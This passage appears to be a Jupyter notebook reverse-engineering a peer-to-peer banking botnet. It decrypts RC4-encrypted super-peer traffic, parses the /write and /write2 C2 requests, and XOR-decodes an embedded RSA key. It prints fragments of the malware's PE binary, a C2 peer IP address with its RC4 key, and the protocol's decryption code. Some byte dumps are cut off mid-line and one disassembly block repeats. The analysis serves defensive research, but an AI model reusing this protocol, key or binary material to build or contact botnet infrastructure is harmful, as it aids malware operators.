binstorage_header = parse_binstorage_header(binstorage)
print("binstorage_header:\n")
pprint.pprint(binstorage_header)

binstorage_sections = parse_binstorage_sections(binstorage_header["version"], binstorage[48:binstorage_header["size"]])
print()
print("binstorage_sections:\n")
pprint.pprint(binstorage_sections)

sha256 = hashlib.sha256()
sha256.update(binstorage_sections[0]["data"])
binary_sha256 = sha256.hexdigest()
print(f"\n{binary_sha256=}")

binstorage_header:

{'flags': 0,
 'md5Hash': b"4\xe0c2\x9b\x16\xe4\x92~\xf4\x0c\xff\xcb\x83\xcf'",
 'randData': b'M\x0b\\T\x87F\xb6r\x07\xac\xb9\xc2\x93\x8e\xdc\rvE\xf5\xd8',
 'size': 272658,
 'version': 82399753}

binstorage_sections:

[{'data': b'MZ\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
          b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
          b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
          b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x000\x01\x00\x00'
          b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
          b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
          b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
          b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
          b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
          b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x

          b'\xbc!\xbc\xd0\xea1\xdf\x88\x8fVc0a\xf9\xd6"\x04\x9ej\x9a'
          b'\xbd\xa6\xbd\x07\xd8\xc1\x01\xbf6n\xb4\xadS\t\x08\x15\x9aNr\x1d'
          b'\xff)\xce\xa5\x11\x86{\xb7t\xe1\xc7\x0f\xcd\xd9\x10\x92'
          b'\xa8\xbe\xac*F\x11\x198#v\xa5\x80uf\xc6\xd8\x10\x01z`\xfe\xae\xcfr'
          b'\x9b\xc9s\xca"\xf1\xa4WG\x96\x18\xef\xa99\xad\xfd\xcc^\x11E'
          b'\x06\xeeMvc\x89\xf1\xce\x8d&D\xdc\xe8A\xf8dQy/\xf94\x1e\x93A'
          b'\xda\xb1&S\xbf\xd6\x9a\xeb\xe9\xc6\xf9\xb3\x8c\xa1E\x0b'
          b"b\x0e\xf0\x19\x07iL\xa1\xbeQ\x9b<\xdb6'\x845\x99\x92\x96P\xfe.."
          b'\x99\xb9T&\xfc\xde\xe8\x9e\x12q]\x8cw\x16\xe14\xce.6\xa9'
          b'\xabI\x8a\x11E\xe6?\x03 \x81\x83\xbbv\x91\xe0\xe3\x13\xf6\\['
          b'\xfdY\xe9I\x98>U\xf1!\x06\x82lDa>\xd4\xaa\xce\x8b\xc6\xcf\xa97~'
          b'8A\x7f\xd6]&\xc3n\xb3\x89v|\xd6\xee\xca\xc4o\xd6\x1dY\n\xb1\xa1\xe1'
          b'\xe4\x1e\x14\xf3\x81y\xa8K\xd7i\xcb\x13\xb2\x0ew\xab\\\xa1\xc2\xb9'
          b'9\xc6~\x01\x80\xf

          b'\xc1\x8e8l\xe1\x92\rp\xfc\x964t\xf8\x9a\x19x\xf9\x9e\x01|'
          b"\xf3\xa2s\x80,z.X\x13~'\\\x1b\x82s`\x17\x861d\x1a\x8aVh\x8a\x8eel"
          b'\xa1\x92\x10p\x85\x96mt\xe8\x9a\x0ex\xfc\x9eO|\xbb\xa25\x80'
          b'\xb8\xa6X\x84\xcd\xaa[\x88\x8f\xae>\x8c\x84\xb2\xd1\x90'
          b'\xfb\xb6\xcf\x94\xed\xba\xc2\x98\xfc\xbe\xaf\x9c\x96\xc2\xb6\xa0'
          b'\xcb\xc6\xb5\xa4\x9c\xca\xa5\xa8\xae\xce\xea\xac\xa8\xd2\xae\xb0'
          b'\xc2\xd6\xce\xb4\xaa\xda\x8b\xb8\xb5\xde\xd7\xbc\xbd\xe2\xc0\xc0'
          b'\xac\xe6\x97\xc4\xfe\xea\x9e\xc8\x93\xee\x9d\xcc\xc4\xf2\xa4\xd0'
          b'\x87\xf6\xb3\xd4\x83\xfa\xeb\xd8\xd5\xfe\xbc\xdc\xf9\x02\xd9\xe0'
          b'\xf8\x06\x00\x00!z"X\x13~=\\\x1b\x82 `\x17\x861d\x08\x8a{h'
          b'\xc5\x8e1l\xec\x92\x02p\xe6\x96\x04t\xe9\x9a\x0fx\xb0\x9e=|'
          b'\xc7\xa22\x80\xb8\xa6\x16\x84\xf2\xaa\x1f\x88\x80\xae>\x8c'
          b'\xe1\xb2\xd0\x90\x88\xb6\xc4\x94\xde\xba\xf2\x98\xc0\xbe\xfb\x9c'
          b'\xdb\xc2\xf

          b'\xf0\x9fs\x999;J/I\xd9\xf0 \xd9[\xf3 I?\xd5\xee\x97\x1f*\xd0'
          b'&d\xd3\xd0>[S$\x107Py\x9b\xc4X/\xb9\xe2 \xee\xe9\xfa|/\x11|\xb7x'
          b'\x9a;=/\xb9\x067/\xd5\xc4\xe6\xee&\x8b\xc5\xd06\xc4(\xee'
          b"\xb9\xa5\xc9'\t[\x8b\x7f&\xe7\xd1/83\x95y\xb9q\xf8\x0b\xe0;w/"
          b'\x10\x80\xf9\xd0\x1ek\xe9\x7f\xb9n\xac\xee^kY/\x8a\xf7\x9e\xe3'
          b'\x8a\xf7x\xd0\xe6\xeb\xdf S:\xdf\x99\x8b\xc4U/`\x11P/\xa0^\xad\xd0'
          b'S\xd02/\xbak&/WRZx\x9d\xfe\xad\xd0IHR/\xca3I/\xc0\xdd6\x7f'
          b'\x036\xad/\xb9\xd6\xad\xee\x17\x1f\x0e/\x953H$x\x96\xad\x0b'
          b'S\xbfR\xd0\x0b\xfa"/\x026\x93$\xa0QR/\xcb\xc5\x02\xd0lk\xc9$'
          b"\xf9\xa0@\x0b\t\xf6\xad'\xf0\x99R \xed\x1f\x91\x0b\xaf\x18\xc8:"
          b'\x83\xe5Y\x7f&\xdeR\xa2\xf4\xc4\\OXrX\xd0\x16\x0f\xad\x99bH\x02/'
          b'\x8b\x8d\xc9\xd0U\xe8r:\xda\xad\x02\x0b\xb9\xcf\x04\x7fy\xc4=\xd0'
          b"v\x96c\x99`\xc52\xeeb\xa92'j0Hxn\x92$\x0bQ\xde\xad/S\xcbR/.4\xc4 "
          b'\xf

          b'F\xb2Y\xd0\x92\xc4\x9cOF;Y#\xb4\x96q\x87F\xe7]/\xe7\x1f\xafx'
          b'\x8a\xf7\x9e\xe3\x8a\xf7\x9c\x9c\xb9\x8d\xad \x8c;\x15\x0b'
          b'\x86\xfa\xadZ\xf0\xf6\xdcj\xcb;v:\x97;\x94\xa1H\xc4RB\xcb\x1f\xbc3'
          b'F;]/4\xfaRM\xf0m\xe4\x0e\x16\xccriF;ZOU\xc4\xf1e\x90\xc42@'
          b'\xb9\xfa\xfb\n\xb9;\xad\x7f\xa9.\xcb\x87\xb4\xc4R\xea'
          b'\x16\xf4\xbf\xf3F4R\xd0W\xc4X%\xd0\xc4\x02\x89\x87|i\x96F4\xad\x0b'
          b"\xe0[\xb36\x17\xc4]r\xb9\xd2\xe9\xca\xb90\xad'\x1ek\x0c\xc03.R\x06"
          b'F\xfaI!\xcbl\xe4yw\xfa\xb0\x19B\x8d\xad\xa4I\xf6h\xceS.Ry\x9c\xc4#}'
          b'\xa1\x1f\x93{\xb9f(\x16S\xc42\xd0al7b\xa4\xc4\xad\xa4\xb9\xe2.\xe9'
          b'\xf04Z/];\xa6\xdf\xe54\xad\xeb\xb9c\n0\x87;R/\x80\xc4\xb1c^4\x02p'
          b'\xb9|\x9e\xedF\xc4R/\x024\xceX\xd2l\xad\xf1\xb9\xbe\xde\xd9'
          b'\xf0m\xdf$\xf7;v&*mR\xc7\xb9\xa2\xbb\xba\x11\xc4R/\xf7\xc4\x07\xeb'
          b'\x8b\xc4\x02\xc1I\xc6\x96\x1aF\xc4R zk\x0c\x80\xee;G\xb7'
          b'

...

          b'\x84$\x80\x00\x00\x00P\x8dD$\\P\x8d\x84$\x98\x00\x00\x00j0P\xe8\x0f'
          b'p\x01\x00\x83\xc4\x14\x85\xc0u\x0f\x8bD$T\x8d\x8c$\x8c\x00\x00'
          b'\x00+\xc1\xeb\x023\xc0\x89D$,\x8d\xac$\x8c\x00\x00\x00\x8b\xf8'
          b'\x8b\\$$\x8bD$ \x8b3+\xf0\x03\xf7;3v;\x8bD$\x1c\x8b\xd6'
          b'\x8b\xc8\x8b\x18\xe8\xbf~\x00\x00\x84\xc0u\x0c\x8bD$$3\xff\x8b0+t$'
          b' \x8bT$\x1c\x8bL$\x18\x8b\x02+\xc3\x8b\\$$\x03\xc8\x8bD$ \x89'
          b'L$\x18\xeb\x08\x8bT$\x1c\x8bL$\x18\x85\xf6t)\x03\xc8\x8b'
          b'\x02+\xc1\x03\x03P\x8bD$\x1cQ\x03\xc7P\xff\x15h\x85F\x00'
          b'\x83\xc4\x0cWU\xfft$ \xff\x15d\x85F\x00\x83\xc4\x0c\x8bD'
          b'$\x1c\x8b\xd6\xfft$ \x893\x8b\\$,\x8b\x08S\xe8\x86\x7f\x00\x00\x89D'
          b'$\x18\x85\xc0\x8bD$4\x0f\x85\x0c\xfe\xff\xff\xeb\x04\x8b\\$(\x8bL$8'
          b'\x83\xc1\x04\xffL$<\x89L$8\x0f\x85\xaa\xfd\xff\xff\x8b\xcb\xe8'
          b'\xb4~\x00\x00\x8bL$0\xe8\xab~\x00\x00\x8bL$H\xe8\xa2~\x00\x00\x8aD'
          b'$\x

          b'\xff\x83\r\x98VF\x00\x10h\x00\x00\x00\x80j\x14\xff\x15\x08\x84F'
          b'\x00\x8dL$\x18\xe8\xbc\x10\xff\xff\xebH\xa8\x08t\t\xe8\xd2\x1e\x01'
          b'\x00\x8aD$ \xa8\x03t&\xb9\xbc\xc9B\x00\xe8\x97\x8a\xff\xff\x8bD$ h'
          b'\x00\x00\x00\x80\xd1\xe8\x83\xe0\x01Pj\x01SSS\xff\x15\x00\x80F'
          b'\x00\xeb\x11\xa8\x04t\rh\x00\x00\x00\x80j\x14\xff\x15\x08\x84F\x00'
          b'\x8dL$ \xe8-\x08\x01\x00_^][\x8b\xe5]\xc3VW3\xf6\x8b\xf9V'
          b'\xe8\x89\\\xff\xff\x85\xc0\x0f\x84\x8b\x00\x00\x00P\x8b\xcfF\xe8x\\'
          b'\xff\xff\x85\xc0u\xf3\x85\xf6tz\x8b\x0f\x8bQ\x14\xe8x\x1f\x00\x00'
          b'\x8b\xf8\x85\xfftUj\x04Y\xe8\x84\x1e\x00\x00\x8b\xf0\x85\xf6t\x05'
          b'\x83&\x00\xeb\x023\xf6\x85\xf6t\x04\x89>\xeb\t\x8b\xcf\xe8:\x1f'
          b'\x00\x003\xf6\x85\xf6t+j\x08Y\xe8Z\x1e\x00\x00\x85\xc0t\x0b'
          b'\xc7\x00\xec\xccB\x00\x89p\x04\xeb\x023\xc0\x85\xc0u'
          b'\x12\x8b\x0e\xe8\x10\x1f\x00\x00\x8b\xce\xe8\t\x1f\x00\x002'
        

          b't$\x18\x85\xf6t>\x81|$\x1cv\x04\x00\x00s\x0f\x8b\xce\xe8'
          b'\xbc\xc3\xff\xff\x8b\xf3\x89t$\x18\xeb%\x8b\xee\xe8,'
          b'\xb4\xfe\xff\x83>\x00\x0f\x841\x01\x00\x009\x06\x0f\x83'
          b')\x01\x00\x00+\x06=\x00\x08\x19H\x0f\x82\x1c\x01\x00\x00\x80d$'
          b'T\xfe\x8dE\x04Q\x8b\xcd\xc7D$D\xa0\xccB\x00\xf7\xd9\x89\\$P\x89\\'
          b'$T\x1b\xc9#\xc8QQ\x8dL$L\xe8\xf7\x7f\xff\xff\x84\xc0\x0f'
          b'\x84\xdf\x00\x00\x00\x8bD$L\xf6D$T\x01\x89\\$Lj\x00[\x0fE\xd8'
          b'\x85\xdbu\x1b\x85\xed\x0f\x84\xc0\x00\x00\x00\xe8\xb6\xb3\xfe'
          b'\xff\x89E\x00\xb0\x01\x88D$\x13\xe9\xad\x00\x00\x00\x8dD$$\x8b'
          b'\xcbPj\x00\xfft$(\xe8L\x01\xff\xff\x89D$\x14\x85\xc0th\x8bD$'
          b'$=\x00\x04\x00\x00r]\x8dpv\x8b\xd6\x8dL$\x18\xe8V\xc2'
          b'\xff\xff\x84\xc0tGjv\x89t$ \x8bt$\x1cj\x00V\xff\x15t\x85F'
          b'\x00\x83\xc4\x0c\xe8V\xb3\xfe\xff\x89\x06\x8dN\x04\xfft$P\xe8\xdc'
          b'\xb2\x00\x00\xfft$$\x8bl$\x18\x8dFvUP\xff

          b'\xce\x8dD$\x10f\xc1\xc1\x08Qf\x89L$\x16\x8b\xcbP\xe8"'
          b"\xff\xff\xff\x84\xc0u'\xff\x15\x00\x85F\x00=@'\x00\x00u\x16"
          b"F\xb8\xe8\x03\x00\x00;\xf5\x0fG\xf0G\xb8'#\x00\x00f;\xf8r\xc02\xc0"
          b'\xeb\x02\xb0\x01_^][\x81\xc4\x84\x00\x00\x00\xc2\x10\x00U\x8b\xec'
          b'QSVW\xe8m\xfd\xff\xff3\xd2\x89E\xfc9U\x08\x8dE\xfc\x0fD\xc2P'
          b'\xffu\x08\xffq\x04\xff\x15\xa0\x84F\x00\x8b\xf8\x83\xff\xfftb3'
          b'\xf6VVW\xff\x15\xb0\x84F\x00j\x14Y\xe8\xf4J\xff\xff\x85\xc0t\nW\x8b'
          b'\xc8\xe8\xf3\xfa\xff\xff\x8b\xf0\x85\xf6t#j#\x8b\xce'
          b'\xe8\xa8\xfb\xff\xff\x84\xc0t\x04\x8b\xc6\xeb.\xff\x15\x00'
          b'\x85F\x00\x8b\x16\x8b\xcej\x01\x8b\xd8\xff\x12\xeb\x13j\x08[j\x02'
          b'W\xff\x15\x04\x85F\x00W\xff\x15 \x85F\x00S\xff\x15\x1c\x85F'
          b'\x003\xc0_^[\x8b\xe5]\xc2\x04\x00j\x00\xfft$\x0c\xfft$\x0c\xffq'
          b'\x04\xff\x15\x0c\x85F\x00\xc2\x08\x00\x83\xec,SUV\x8bt$@'
          b'\x8b\xd9W\x8b|$@\x85\

          b'\xe8?\xfb\xff\xff_^\x8b\xe5]\xc3\x81\xec\x80\x03\x00\x00SUV'
          b'W\x8b\xf2\x89L$\x18\xbb\x00\x01\x00\x00\x8d\x8c$\x90\x00\x00\x00S'
          b'Q\xff\xb4$\x9c\x03\x00\x00\x8b\x06V\xffP\x143\xff\x85\xc0t\x04'
          b'\x8b\xef\xeb\x13Wj\xff\x8d\x94$\x98\x00\x00\x003\xc9\xe8\x1f5\xff'
          b'\xff\x8b\xe8\x8b\x0e\x8d\x84$\x90\x01\x00\x00SP\xff\xb4'
          b'$\xa8\x03\x00\x00V\xffQ\x14\x85\xc0t\x04\x8b\xdf\xeb\x13Wj\xff'
          b'\x8d\x94$\x98\x01\x00\x003\xc9\xe8\xee4\xff\xff\x8b\xd8'
          b'\x8b\x0e\x8d\x84$\x90\x02\x00\x00h\x00\x01\x00\x00P\xff'
          b'\xb4$\xac\x03\x00\x00V\xffQ\x14\x85\xc0u\x13Wj\xff\x8d\x94$'
          b'\x98\x02\x00\x003\xc9\xe8\xbd4\xff\xff\x8b\xf8\x8b\x0e\x8dD$\x10P'
          b'\xff\xb4$\x9c\x03\x00\x00V\xffQ\x10\x8bL$\x103\xd2\x85\xc0\x8b'
          b'\x06\x0fE\xca\x89L$\x10\x8dL$\x14Q\xff\xb4$\xa0\x03\x00\x00'
          b'V\xffP\x10\x8bL$\x143\xd2\x85\xc0\x0fE\xca\x8dT$,\x89L$\x14\xb9'
          b'\x9c\x00\x00\x00\xe8

[https://www.virustotal.com/gui/file/a6deb1f03b03db1d7a2f5aefe06390d570019fe4d3af9cce06e2285bf48cfa54](https://www.virustotal.com/gui/file/a6deb1f03b03db1d7a2f5aefe06390d570019fe4d3af9cce06e2285bf48cfa54)

## TCP Command 204 with POST /write Request

`/write` POSTs were an older version that didn't encrypt the POST data.

PCAP from [https://www.virustotal.com/gui/file/b3f5d26f12070d68b11e04caddb803a83f24d73dc03bad6023761e713448cc90](https://www.virustotal.com/gui/file/b3f5d26f12070d68b11e04caddb803a83f24d73dc03bad6023761e713448cc90)

In [20]:
super_peer_ipv4 = "68.98.96.4"
super_peer_ipv4_tcp_port = 5320
super_peer_rc4_key = b'\xc6\xf7\xef$LT\xce\x1e\x15]\xe1\xe4\xe7\x9d\xf2\xad\xe5\\o\x90'

In [21]:
# multiple sends, but combining them so decryption lines up
tcp_data = binascii.unhexlify("3908bd5dc7b20782e0e299a293c6cb0698004bc7751254fc065d1dc6387cff4194768aff56e881983e9a8e9a324cfa81c07d84ca4da1de0efa2a5646522d10b5e721bed8f695b8337f49a8ce5df3418a5ac76a72c884b45afe3e4f9d3f7ff3b0d938cae29414e8bcbdf5e35e7e0cfb8afa0ba6d55fd7631a791242418b4d1eb1643505603687927087b2e889e5bdd2d35904c79097aaa32dee1d1ca7279866bcd0459966b32e23a0d075fe4a25943ee4924201f99ab93ec61c80f9da70c47d6bb8534c6057da4ab02be45367c5a8b7fd372803d10da85c6dfff6cc540d8e48a6e0cb9d27fb1ce41c")
tcp_data += binascii.unhexlify("a8fe5ba9eaa0ff73e0d15477b445d6ec136cddbe1cb9d1e932790e87d753d8e40f08f3b927a984185a3d6d6ae3b5fc4e74a75ceeaaafd0ec4f5c7f6bf31c9641aea68b901f9e94d38728ea08aa8ae162ebd46e4eafabb057be1bc11a34a1b659b0df8b8d5e7160aeecd1a56d49525c454d3a2d5ed594882dc1524e6c48398e27b632f82b522da4742ac7b911aa2c0e03aa463f8aa3b3f982bdcd83c8575dbf0868a51886dcaea4c697d73fc94510a865ea24b0b04eb7240576711cfafb7b2f69f6688b68072c05fdf43104f879c094b68969f2a2ec06b8e25a482027754ed052dd0c0a12f0e366dcde749bddd065e9ac1bbd15d3358491d7f7f2f8ab128d187afd98717f1ead2204ee39514bf74c9098670f7ba193c67a05a8e35585209534a1a0fcf55a34eb833917767d3ce86105f5be5961cfd3f329da3c4b4ce4790d287a57258726abb2015d3dd0aed33e725529829c36cad2550719075f47a2c2d3bc44dae0001e396ae00de13bc54e70be06d10c2fe3bba5188e4de5a3410d2b3d33a84fbbae667c58aa7f0d2532d99354ac07ed6cb0237b0ea6f832fead85313900f88c60875e7997374fb69fc39234ec656e18044382817a6a4faa90b4e1694b")

plainbuf = decrypt_p2p_command(super_peer_rc4_key, tcp_data)

# header + padding len
command_204 = plainbuf[0:44+188]
plainbuf = plainbuf[44+188:]
command, command_data = parse_p2p_command(command_204)

end_of_http_request = plainbuf.find(b"\r\n\r\n") + 4
http_request = plainbuf[:end_of_http_request].decode()
print("\nhttp_request:\n")
print(http_request)

http_data = plainbuf[end_of_http_request:]

print("\nhttp_data:\n")
print(http_data)

binstorage_header = parse_binstorage_header(http_data)
print("\nbinstorage_header:\n")
pprint.pprint(binstorage_header)

binstorage_sections = parse_binstorage_sections(binstorage_header["version"], http_data[48:binstorage_header["size"]])
print()
print("binstorage_sections:\n")
pprint.pprint(binstorage_sections)

field_0=203
field_1=4
padding_length=188
command=204
session_id=b'4E\xccJ\xd9\xee%7YL\xad\xe9\xb2S\xb5z\xff\xed\xc3h'
sender_rc4_key=b'Di\xc7\rK\x01\xb7\xaa_\x94\xc8n\x1f\xafN\x85a\x1fv\xa3'
command_data=b''
padding=b'5\x94=\x1b\x8b^\xf6\x0f\xa8\xbf\xc5\x91\xdf\xd6\xc0Gx\xe1\xbd\xd7\x15\x95<o\xc1\xe3\xc4\x8c&\xe843qE\xff\xc9\x9dA(H6p{\xd5\xd0Q\x07\xe6l\xae\xfbcM\xd9Q\x052\x08\xb3\xc2\x10u;J\xf2\x7fD\xf4\xaf+\xb0\xd9\xb3\xc8\xf1VlQ\xd3\xbes\x87\xbeE\xa1\x1b\xd7\x06\xe6x\xa1b\xf1x\xeb0-\x02\xfdv\x89\xc0\xa3\xee\xce\xad\xe7\xf6a\xf7@hLI\xdb\xe1\xb1\xc0\xb2\xe2\xf8z\xe2\x1c\x0f\xd1\xb1\xa2\x8f!\x16\xfc\xd4Ou&\x85\xb6\x97$\xa8\xc8\xc1"\xdb\xe8A\t]\r\xd1O1\xf9^R)\xdaa\xf9\x15\x88\x9b\x85\xc2\xe89.\xb1\x9c\xe3}j|\x13\x80tJ\xbb\x87F\t\xf2~\xe7`8\x05'
field_1 != ~session_id[1]: 4 / 186

http_request:

POST /write HTTP/1.1
Host: default
Accept-Encoding:
Connection: close
Content-Length: 337
X-ID: 5555



http_data:

b'\xfbI\x9c\xeb{4\x04"\xf6gKG\xfa\xcf\x1a\xe9\xfdWd\xe6Q\x01\x00\x00\x00\x00\x00

## TCP Command 204 with POST /write Response

Empty response in this example, but this is where commands (see section below) could be issued.

In [22]:
tcp_data = binascii.unhexlify("5303106d118e56bcc5f077a06cd3e2f1c7836783fa320023982931328de193938f6d0eced807726ed7695c6df62dca0067a86b5cfea7a497e6653c5930242f7f9b8ce0bd47eb3e2477d3a6d342e3f84c31cb62d218c0d8261d86260d45b0761d8a20410262006892a9ced7941ae209b51f61b32d396bb61155865ae4c6f2b36a771e3aeab3776e28f9a7a3ab0034e95d66f41d2667eb067a4d4d30c64b0650f8ae0de9befb05365fc748ce79b1d088c0f34c4e95a50c0e1a5770dfac72504cc2a683d68eac7f1be7764ff872ebdba4d802ca271c4e5f5d82a608d5917aca")

plainbuf = decrypt_p2p_command(victim_rc4_key, tcp_data)

end_of_http_response = plainbuf.find(b"\r\n\r\n") + 4
http_response = plainbuf[:end_of_http_response].decode()
print("\nhttp_response:\n")
print(http_response)

i = end_of_http_response
chunk_len = int(plainbuf[i:i+4].strip(), 16)
print(f"\n{chunk_len=}")
i += 4
chunk = plainbuf[i:i+chunk_len]
i += chunk_len
print(f"\n{chunk=}")

end_chunk = plainbuf[i:]
print(f"\n{end_chunk=}")

binstorage_header = parse_binstorage_header(chunk)
print("\nbinstorage_header:\n")
pprint.pprint(binstorage_header)

binstorage_sections = parse_binstorage_sections(binstorage_header["version"], chunk[48:binstorage_header["size"]])
print()
print("binstorage_sections:\n")
pprint.pprint(binstorage_sections)


http_response:

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 16 Jan 2015 00:24:11 GMT
Content-Type: application/octet-stream
Transfer-Encoding: chunked
Connection: keep-alive



chunk_len=48

chunk=b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x000\x00\x00\x00\x00\x00\x00\x008\xd0O\xa9\xd4\x1d\x8c\xd9\x8f\x00\xb2\x04\xe9\x80\t\x98\xec\xf8B~'

end_chunk=b'\r\n0\r\n\r\n'

binstorage_header:

{'flags': 0,
 'md5Hash': b'\xd4\x1d\x8c\xd9\x8f\x00\xb2\x04\xe9\x80\t\x98\xec\xf8B~',
 'randData': b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
             b'\x00\x00\x00\x00',
 'size': 48,
 'version': 2840580152}

binstorage_sections:

[]


## TCP Command 204 with POST /write2 Request

`/write2` POSTs were a newer version that encrypted POST data.

A random 32-byte AES session key was generated. The POST data was then AES encrypted. The session key was RSA encrypted using an embedded RSA public key. The response data was AES encrypted with the same AES session key.

PCAP from [https://www.virustotal.com/gui/file/898a555a1d4703f9a1787b2e6001b7532aa39dbde018f3a05e2f96f7baac6af1/behavior](https://www.virustotal.com/gui/file/898a555a1d4703f9a1787b2e6001b7532aa39dbde018f3a05e2f96f7baac6af1/behavior)

## Embedded RSA Public Key \#2

Pseudocode:

      ...
      session_key_len = 0x5A3ACE6;
      s_crypto3.type = 2;
      s_crypto3.vtable = &g_s_crypto3_xor_vtable;
      memset(&s_crypto3.key, 0, 9); 
      g_s_crypto3_xor_vfunc3_clear_key(&s_crypto3);
      *&s_crypto3.key_len = 4;
      *&s_crypto3.key = &session_key_len;
      s_crypto3.buf_set = 0;
      g_s_crypto3_xor_vfunc9_decrypt(&s_crypto3, g_enc_rsa_key_exfil, 276u, rsa_key, 276u, 1); 
      ... 
    
 Disassembly:
 
    ...
    .text:00ECA92C C7 44 24 18 E6 AC A3 05       mov     [esp+164h+key], 5A3ACE6h
    .text:00ECA934 C6 44 24 28 02                mov     [esp+164h+var_13C], 2
    .text:00ECA939 C7 44 24 24 04 38 E9 00       mov     [esp+164h+s_crypto3], offset g_s_crypto3_xor_vtable
    .text:00ECA941 89 44 24 2C                   mov     [esp+164h+var_138], eax
    .text:00ECA945 89 44 24 30                   mov     [esp+164h+var_134], eax
    .text:00ECA949 88 44 24 34                   mov     [esp+164h+var_130], al
    .text:00ECA94D E8 DF A9 FF FF                call    g_s_crypto3_xor_vfunc3_clear_key
    .text:00ECA952 6A 01                         push    1
    .text:00ECA954 8D 44 24 1C                   lea     eax, [esp+168h+key]
    .text:00ECA958 C7 44 24 34 04 00 00 00       mov     [esp+168h+var_134], 4
    .text:00ECA960 BE 14 01 00 00                mov     esi, 114h
    .text:00ECA965 89 44 24 30                   mov     [esp+168h+var_138], eax
    .text:00ECA969 56                            push    esi
    .text:00ECA96A 8D 44 24 50                   lea     eax, [esp+16Ch+rsa_key]
    .text:00ECA96E C6 44 24 3C 00                mov     [esp+16Ch+var_130], 0
    .text:00ECA973 50                            push    eax
    .text:00ECA974 56                            push    esi
    .text:00ECA975 68 C8 1A E9 00                push    offset g_enc_rsa_key_exfil
    .text:00ECA97A 8D 4C 24 38                   lea     ecx, [esp+178h+s_crypto3]
    .text:00ECA97E E8 E4 A9 FF FF                call    g_s_crypto3_xor_vfunc9_decrypt
    .text:00ECA92C C7 44 24 18 E6 AC A3 05       mov     [esp+164h+key], 5A3ACE6h
    .text:00ECA934 C6 44 24 28 02                mov     [esp+164h+var_13C], 2
    .text:00ECA939 C7 44 24 24 04 38 E9 00       mov     [esp+164h+s_crypto3], offset g_s_crypto3_xor_vtable
    .text:00ECA941 89 44 24 2C                   mov     [esp+164h+var_138], eax
    .text:00ECA945 89 44 24 30                   mov     [esp+164h+var_134], eax
    .text:00ECA949 88 44 24 34                   mov     [esp+164h+var_130], al
    .text:00ECA94D E8 DF A9 FF FF                call    g_s_crypto3_xor_vfunc3_clear_key
    .text:00ECA952 6A 01                         push    1
    .text:00ECA954 8D 44 24 1C                   lea     eax, [esp+168h+key]
    .text:00ECA958 C7 44 24 34 04 00 00 00       mov     [esp+168h+var_134], 4
    .text:00ECA960 BE 14 01 00 00                mov     esi, 114h
    .text:00ECA965 89 44 24 30                   mov     [esp+168h+var_138], eax
    .text:00ECA969 56                            push    esi
    .text:00ECA96A 8D 44 24 50                   lea     eax, [esp+16Ch+rsa_key]
    .text:00ECA96E C6 44 24 3C 00                mov     [esp+16Ch+var_130], 0
    .text:00ECA973 50                            push    eax
    .text:00ECA974 56                            push    esi
    .text:00ECA975 68 C8 1A E9 00                push    offset g_enc_rsa_key_exfil
    .text:00ECA97A 8D 4C 24 38                   lea     ecx, [esp+178h+s_crypto3]
    .text:00ECA97E E8 E4 A9 FF FF                call    g_s_crypto3_xor_vfunc9_decrypt...
    ...

In [23]:
match = re.search(rb'\xc7\x44\x24[\s\S](?P<xor_key>[\s\S]{4})\xc6\x44\x24[\s\S]\x02[\s\S]{1,48}\xbe(?P<encbuf_len>\x14\x01\x00\x00)[\s\S]{1,48}\x68(?P<encbuf_addr>[\s\S]{4})', 
    pe.get_memory_mapped_image())

encbuf_len = struct.unpack("I", match.group("encbuf_len"))[0]
xor_key = match.group("xor_key")
encbuf_addr = struct.unpack("I", match.group("encbuf_addr"))[0]
encbuf_rva = encbuf_addr - pe.OPTIONAL_HEADER.ImageBase
encbuf = pe.get_data(encbuf_rva, encbuf_len)

plainbuf = b""
for i, eb in enumerate(encbuf):
    pb = eb ^ xor_key[i % len(xor_key)]
    plainbuf += struct.pack("B", pb)
print(f"{plainbuf=}")

plainbuf=b"\x06\x02\x00\x00\x00\xa4\x00\x00RSA1\x00\x08\x00\x00\x01\x00\x01\x00\x9fN\xab.\xbd8EU\xc6Z\x9f\xb4u\x84{i\xc4G\x15\xbb\x8c6\x97[S\x9e\xf9\\\x87\xbf\x0bKSoHFI\xed*wO4]$:\xc4\x12\xd7\xdd\xf6s\x02\x81\xa3\xfe\xb4zr\xbfL\xb6\x0bP1\x88\xe4M\tv\x12m?N\xdbV\xd0%\x1atP\xcf/\xa0\xa0|\xb1\x99\xd4\xab\x1a\xdd\xf6\x01\xcbg\xf7\xcdz\xe7\x93\xfb\xe0\x886e\xdb\x8d\xff\xd4:\xfa\xef\x84/\x8d\x1dm\xec\x90\xa5n\xf8\xd7Y\x991$\xd3\x88\xa6\xed\xf2\x03jx\x8e\xaf\x0c\xe2\xd9@\xd9z\x91D\xa4\xe58\x9fS6\x89\xbe\x83Tp%\xc8\xeb\xca\xae\xfc\x83w~\x99s~\xca\xc4e\x18i\xb7dL$\xe7\xc3\x9f]\xe1Z\xf8&'w\x11U\xc8\x9e\xdf\x8f\n\x0bu\xb4&\xf7\x94Z\xad\xc1\x9e\x8eQ\x11l\x83\x03\xa4\xe2\xd0j\x1f\x03\xe8Sk\xdc\t\xb1\x8bp4\xa5dFo\n\xcbO(\x90\x94W\xf2\x0b\x00\xc7`Jl\xb8\xbb\xa1\x1e\xa3\xf2\x92\xd26w\xe8\t\xb4"


In [24]:
# multiple sends, but combining them so decryption lines up
